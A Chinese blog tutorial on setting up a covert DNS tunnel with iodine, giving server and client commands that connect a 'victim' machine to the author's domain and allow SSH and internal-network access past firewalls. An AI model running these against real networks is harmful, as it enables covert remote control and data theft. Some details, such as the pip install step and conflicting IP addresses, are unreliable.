内网隐蔽隧道之DNS隧道搭建(iodine)

已于 2023-02-20 09:05:13 修改
阅读量5.8k 收藏 32
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 内网攻防 文章标签: iodine dns隧道搭建
于 2022-05-20 18:24:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/124885174
本文详细介绍了DNS隧道的概念、工作原理和应用场景,特别关注了iodine工具的使用。iodine是一款用于创建DNS隧道的软件,支持直连和中继模式,通过TAP虚拟网卡实现两端的通信。在环境中,首先配置域名解析,然后在VPS上安装并启动iodine服务器端,接着在客户端(Linux和Windows)上安装iodine并连接服务器。通过DNS隧道,客户端和服务器可以建立隐蔽的通信通道,实现内网穿透。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

DNS隧道

iodine

环境搭建

域名解析配置

安装并启动服务器

安装并启动客户端

客户端为linux

客户端为windows

DNS隧道

DNS隧道(DNS Tunneling)是将其他协议的内容封装在DNS协议中,然后以DNS请求和响应包完成传输数据(通信)的技术。当前网络世界中的DNS是一项必不可少的服务,所以防火墙和入侵检测设备处于可用性和用户友好的考虑将很难做到完全过滤掉DNS流量,因此,攻击者可以利用它实现诸如远程控制,文件传输等操作,众多研究表明DNS Tunneling在僵尸网络和APT攻击中扮演着至关重要的角色。

DNS隧道依据其实现方式大致可分为直连和中继两类。

直连:用户端直接和指定的目标DNS服务器建立连接,然后将需要传输的数据编码封装在DNS协议中进行通信。这种方式的优点是具有较高速度,但蔽性弱、易被探测追踪的缺点也很明显。另外直连方式的限制比较多,如目前很多的企业网络为了尽可能的降低遭受网络攻击的风险,一般将相关策略配置为仅允许与指定的可信任DNS服务器之间的流量通过。

中继隧道:通过DNS迭代查询而实现的中继DNS隧道,这种方式及其隐秘,且可在绝大部分场景下部署成功。但由于数据包到达目标DNS服务器前需要经过多个节点的跳转,数据传输速度和传输能力较直连会慢很多。

实现DNS隧道的关键要点:

  • dns2tcp:支持直连模式的DNS隧道,只实现了简单的DNS隧道,相关命令和控制服务需要自行搭建,且已在kali系统中直接集成。
  • iodine:最活跃、速度最快、支持直连和中继模式,且支持丰富的编码、请求类型选择
  • Dnscat2:封装在DNS协议中的加密C&C信道,直接运行工具即可实现数据传输、文件操作等命令和控制功能。

iodine

iodine是基于C语言开发的,分为服务端和客户端。iodine支持转发模式和中继模式。其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务器之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。

环境搭建

域名解析配置

因为我们需要在自己的VPS上使用DNS服务,所以得先配置一下域名 —> 域名注册及域名解析

在添加A记录的基础上,再添加一个NS记录(将子域名指定其他DNS服务器解析,子域名字随便自己定)

  • 第一条A类记录,告诉域名系统,"www.ssrc.top" 的IP地址是 "39.100.88.162"
  • 第二条NS记录,告诉域名系统,"12.ssrc.top" 的域名由 "www.ssrc.top" 进行解析。即12.ssrc.top还是会被解析为33.100.88.162

此时,我们能ping通www.ssrc.top,说明A记录配置正确

 然后在我们的VPS上执行以下命令监听UDP53端口

tcpdump -n -i eth0 udp dst port 53

在任意一台机器上执行  nslookup 12.ssrc.top 命令,如果在我们的VPS监听的端口有查询信息,说明第二条记录设置成功

安装并启动服务器

在vps中安装iodine的服务端,因为为linux系统,直接执行以下命令进行下载

pip install iodine

执行以下命令启动服务端

iodined -f -c -P root@123456 172.16.10.1 12.ssrc.top -DD
    -f:在前台运行
    -c:禁止检查所有传入请求的客户端IP地址
    -P:指定密码
    -D:指定调试级别。-DD指第二级,D的数量随等级增加
    这里的172.16.10.1是自定义的局域网虚拟IP地址

运行之后VPS上会多一个虚拟网卡地址,地址为刚设置的地址

安装并启动客户端

我们在受害者机器上运行客户端

客户端为linux

kali中自带了iodine,如果没有则先下载再进行安装:https://github.com/yarrick/iodine

cd iodine-master
make && make install

然后执行下面命令连接服务端(需要root权限),如图连接成功。

iodine -f -P root@123456 12.ssrc.top

如下,代表连接成功,此时服务端也会有数据反应

 连接成功后,客户端上新建了一个dns0的网卡,IP地址为172.16.10.2,与服务端生成的虚拟网卡的地址处于同一网段

此时vps和客户端相当于处于同一内网环境

1. vps可以直接ping客户端地址172.16.10.2

 2. vps访问内网的web服务

 3. vps ssh连接客户端

客户端为windows

下载:iodine-0.7.0-windows+TAP

iodine.exe使用需要先安装TAP适配器,所以安装openvpn-install-2.3.13-I601-x86_64.exe,安装时只选择TAP Virtual Ethernet Adapte

 将iodine.exe以及dll文件上传到机器上(服务端使用iodined,客户端使用iodine)

安装完TAP后,执行

iodine.exe -f -P root@123456 12.ssrc.top

如下代表连接成功

 此时能看出多出了一张网卡172.16.10.2

此时vps服务端能ping通客户端,但是客户端ping不同服务端不知道为啥

此时在客户端的网段连接中是看不到任何信息的

红队内网攻防渗透:内网渗透之内网通信隧道搭建:代理和转发
HACKONE的博客
06-11 468
端口转发就是将一个端口,这个端口可以本机的端口也可以是本机可以访问到的任 意主机的端口,转发到任意一台可以访问到的IP上,通常这个IP是公网IP。1. 服务器处于内网,可以访问外部网络。2. 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口 的连接。3. 服务器处于内网,对外只开放了80端口,并且服务器不能访问外网网络。映射端口,就是将一个内网端口映射到公网上的某个端口,假设我自己的电脑是在 内网中,没有公网IP,但是我想提供一个端口供其他人使用,这就是端口映射。
内网转发及隐蔽隧道学习手册
谢公子的博客
08-10 1887
内网转发工具的使用 内网转发及隐蔽隧道 Linux利用iptables做端口复用 利用python脚本实现端口复用 Windows利用WinRM实现端口复用打造隐蔽后门
内网DNS隐蔽隧道搭建iodine工具
huayimy的博客
01-04 1300
iodine是基于C语言开发的,分为服务端和客户端。iodine支持转发模式和中继模式。其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务器之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡,所有指令数据等均可通过dns隧道进行传输。
一文学会DNS隧道搭建
Jinmindong
03-09 658
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
深入解析iodine项目的DNS隧道协议v00000500
最新发布
gitblog_00331的博客
06-06 421
深入解析iodine项目的DNS隧道协议v00000500 协议概述 iodine是一个通过DNS协议建立隧道的工具,它巧妙地将网络数据封装在DNS查询和响应中,实现网络通信。本文将详细解析iodine项目中版本号为00000500的协议规范,帮助读者理解其工作原理。 协议版本协商 在连接建立阶段,客户端和服务器首先进行协议版本协商: 客户端发送: 首字节为'v'或'V' 后续内容使用Bas...
DNS隧道工具iodine
大学霸__IT达人
09-28 2225
DNS隧道工具iodine
dns服务期搭建使用_使用Iodine进行DNS隧道搭建
weixin_28882565的博客
01-02 398
一、源码下载Iodine下载地址 GitHub:https://github.com/yarrick/iodine二、源码编译执行make命令以编译服务端和客户端二进制文件。运行make install以将二进制文件复制到目标目录。运行make test以编译并运行单元测试。编译以后文件如下:在bin目录下,有iodineiodined两个文件,分别为服务端和客户端。三、隧道工具运行(1)、参数...
利用DNS隧道构建隐蔽C&C信道
阿道夫的博客
08-09 901
无论是高级持续性威胁(APT)、僵尸网络(Botnet),还是勒索软件、后门等,命令与控制信道(C&C)都是其重要组成部分,尤其是APT和僵尸网络中的C&C信道决定了其威胁程度。学术界和工业界就C&C方面的研究已逐渐深入,目前网络战格局逐渐形成,公众对网络安全逐渐重视,网络空间中的攻防双方持续较量。迫于当前形势,攻击者逐渐转向“低调”,近年曝光的多起大型APT攻击事件都倾向于构建隐蔽的的C&C信道。
内网渗透之DNS隧道搭建
蚁景网安学院
08-26 1135
原创稿件征集 邮箱:[email protected] QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 本文作者:D1m0n 前言 年初有幸参加了一次hvv,我主要负责内网渗透的部分,包括代理搭建,横向移动等等。那个时候,也是刚刚接触内网没两个月,赶鸭子上架的学了一下就上了战场。好在运气不错,通过weblogic的反序列化RCE拿到系统权限,后来发现了一个尴尬的问题,目标主机不出网,借助搜索引擎,大佬们都.
一步一步测试DNS隧道
imtech的博客
07-24 3169
Dns的解析过程;dns隧道搭建;frp配合dns隧道建立代理;
内网渗透 DNS隧道上线 DNS隧道通讯 SSH隧道 Linux上线CS
抟土成人祖,炼石补青天。眼中览银河,手可摘星辰。
07-31 382
内网渗透是指在目标网络内进行未授权的访问、信息获取和控制的一系列操作。DNS隧道和SSH隧道是两种常用的方法,用于绕过网络防火墙和其他安全机制。
「斗象攻防演练宝典」之“红队隐蔽隧道检测”
梅花寺
07-21 471
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
内网隐藏通信隧道技术——DNS隧道
qq_44005305的博客
07-31 1665
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
Iodine DNS隧道实验记录
qq_44465615的博客
03-09 876
Iodine介绍 Iodine,直译过来就是碘。碘元素在元素周期表中序号为53,正好是DNS使用的端口号。 该工具用于建立DNS隧道,其分为服务端和客户端两部分(也常称为主控端和被控端),客户端对服务器端发送DNS请求建立连接。这两部分都是用C语言编写,支持EDNS、base32、base64、base128等多种编码规范。 DNS隧道常分为中继和直连两种类型,中继是指DNS通过外网DNS服务器转发到服务端,直连是指直接通过服务端IP进行连接。Iodine对这两种类型都有支持。同时,Iodine支持多种DN
DNS隧道
03-31 5357
简介 本片文章主要介绍如何使用DNS隧道内网进行穿透,搭建隧道,使得外网机器可以直接访问内网主机,DNS隧道也是比较常见的搭建隧道的方式。 DNS基础 DNS简介 DNS协议主要就是用来在你访问主机域名的时候查询对应的IP地址并返回给你的协议,计算机是根据IP地址和MAC地址来进行通信的。通过DNS可以将域名(方便记忆)自动转换成IP地址来进行通信,这就是DNS的作用。 查询域名对应的IP地址只是DNS可以查询的记录的一种,常见的可查询记录类型如下 类型 内容 A 域名的IPv4 记录
iodine免费上网——本质就是利用dns tunnel建立tcp,然后tcp proxy来实现通过访问虚拟dns0网卡来访问你的dns 授权server...
weixin_34406086的博客
11-16 648
我的命令: server端: sudo iodined -P passwd -f -DD 10.0.0.100 abc.com client端(直连模式,-r表示使用xxx.abc.com的xxx来转发数据,不加-r表示raw): sudo iodine -P passwd -f -r -T TXT 45.77.39.243 abc.com 然后访问:s...
DNS隧道工具』— iodine
localhost01
01-21 8581
一、入坑必读 1、简介 因为 iodine(碘)的原子序数为53,这恰好是DNS端口号,故取名为iodineiodine基于C语言开发,分为服务端程序 iodined 和客户端程序 iodine,kali系统内置。 服务端程序 iodined 提供特定域名的DNS解析服务。当客户端请求该域名的解析,就可以建立通道连接。 支持EDNS、base32,base64,base128等多种编码规范,更......
DNS协议隧道iodine
分享学习网络的点点滴滴
10-02 836
基于DNS查询的隧道工具与同类工具相比的优点对下行数据不进行编码,因此性能优支持多平台:LINUX\BSD\MAC OS\WINDOWS最大16个并发连接强制密码支持支持同网段隧道IP(不同于服务器,客户端网段)支持多种DNS记录类型丰富的隧道质量检测措施隧道网络接口不基于资源的通用隧道,如同本网段内两台相邻的主机服务器端和客户端分别生成隧道网络接口dns0隧道两端接口的IP地址应不同于客户端和服务端网段基于此隧道可嵌套其他隧道技术。
DNS隧道搭建
03-21
### 如何搭建DNS隧道的过程与工具 #### DNS隧道的概念及其重要性 DNS隧道是一种利用DNS协议来传输数据的技术,它能够绕过传统的网络安全措施并隐藏通信流量。由于DNS是互联网的核心基础设施之一,任何设备连接到网络都需要依赖于DNS解析服务[^1]。 #### 工具介绍——iodine 碘(iodine)是一个常用的开源工具,用于创建基于DNS隐蔽通道。该工具允许用户通过标准的DNS查询发送TCP/IP数据包,从而实现远程访问或绕过防火墙的功能[^2]。 #### 搭建过程概述 以下是使用iodine搭建DNS隧道的主要环节: #### 1. 配置DNS服务器 为了支持DNS隧道功能,需要设置一台专门配置好的DNS服务器作为目标端点。这台服务器负责接收来自客户端的数据请求并将它们转发至实际目的地。具体操作可以参考Windows Server 2003下的DNS服务器构建指南。 #### 2. 安装iodine软件 分别在服务器侧和客户机上部署iodine程序文件。对于Linux平台可以直接通过包管理器获取;而在Windows操作系统则需手动下载可执行版本进行安装。 #### 3. 启动服务端监听模式 在已准备完毕的DNS主机之上运行iodine命令启动服务进程,指定相应的参数比如子域名称、密码字符串以及本地IP地址范围等选项。 ```bash sudo iodined -f -c -P yourpassword 10.0.0.1 example.com ``` #### 4. 连接客户端至隧道入口 同样地,在另一终端输入对应指令让计算机加入由上述步骤建立起来的安全链路之中去。 ```bash ./iodine -f -r nameserver_ip -P yourpassword subdomain.example.com ``` #### 技术细节探讨 关于整个过程中涉及到的具体机制可以从以下几个方面展开讨论: - **编码方式**: 将常规二进制流转换成适合嵌入TXT记录形式的内容表示法; - **分片处理**: 当单条消息长度超过最大限制时,则将其分割开来逐一分发出去后再重新组装回来; - **加密保护**: 使用预共享密钥或者其他更复杂的方法保障信息安全传递不受第三方窃听威胁影响[^3]。 #### 流量特征分析 通过对正常业务活动同异常行为之间的差异对比研究发现了一些显著区别之处可以帮助我们更好地理解和检测此类现象的发生情况。例如频繁出现大量不常见类型的资源请求或者持续时间较长却几乎没有真实意义回应的现象都可能暗示存在潜在风险隐患的存在。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值